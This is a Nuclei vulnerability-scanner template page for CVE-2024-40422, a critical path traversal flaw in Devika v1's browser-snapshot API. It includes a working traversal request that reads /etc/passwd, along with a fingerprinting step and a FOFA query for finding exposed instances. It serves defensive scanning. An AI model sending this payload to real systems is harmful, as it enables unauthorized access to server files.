Skip to content
Nuclei Templates

Devika v1 - Path Traversal

ID: CVE-2024-40422

Severity: critical

Author: s4e-io,alpernae

Tags: cve,cve2024,devika,lfi

Description

Section titled “Description”

The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.

YAML Source

Section titled “YAML Source”
id: CVE-2024-40422


info:
  name: Devika v1 - Path Traversal
  author: s4e-io,alpernae
  severity: critical
  description: |
    The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-40422
    - https://cvefeed.io/vuln/detail/CVE-2024-40422
    - https://github.com/alpernae/CVE-2024-40422
    - https://github.com/stitionai/devika
    - https://www.exploit-db.com/exploits/52066
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-40422
    cwe-id: CWE-22
    epss-score: 0.0087
    epss-percentile: 0.82513
    cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: stitionai
    product: devika
    fofa-query: icon_hash="-1429839495"
  tags: cve,cve2024,devika,lfi


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /api/data HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"models","projects","OPENAI","OLLAMA")'
          - 'contains(content_type,"application/json")'
          - "status_code == 200"
        condition: and
        internal: true


  - raw:
      - |
        GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: word
        part: header
        words:
          - "application/octet-stream"


      - type: status
        status:
          - 200
# digest: 490a0046304402207d06d28f14a6c0a0cc1494de904340bef4d20f80a083c623729da3cae83b49820220577b52f74b3e273d7833b59b886b040d072a2718391c7b8a73fd8d85f2dddaa4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-40422.yaml"

View on Github